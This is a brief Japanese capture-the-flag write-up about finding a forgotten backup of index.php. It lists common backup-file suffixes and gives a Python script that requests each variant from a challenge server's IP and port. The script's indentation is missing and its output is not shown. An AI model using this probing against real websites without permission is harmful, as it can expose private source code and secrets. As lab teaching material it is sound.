トピック:先生はバックアップ ファイルを削除するのを忘れました。先生はシャオ ニンにバックアップ ファイルを探すよう送りました。一緒にシャオ ニンを助けましょう!
ページを開く:
ここで、index.php のバックアップ ファイルを見つける必要があると考えがちです。
Web ページの一般的なバックアップ ファイルのサフィックス: 「.git」、「.svn」、「.swp」、「.~」、「.bak」、「.bash_history」、「.bkf」
一つ一つ試すのは面倒なので、ここに小さな Python スクリプトを示します。
import requests
txt=[".git",".svn",".swp",".~",".bak",".bash_history",".bkf"]
url="http://111.200.241.244:58222/index.php"
for i in txt:
url_end=url+i
html=requests.get(url=url_end)
if "flag" in html.text:
print(html.url)
print(html.text)
実行して次のものを取得します。
提出して終了。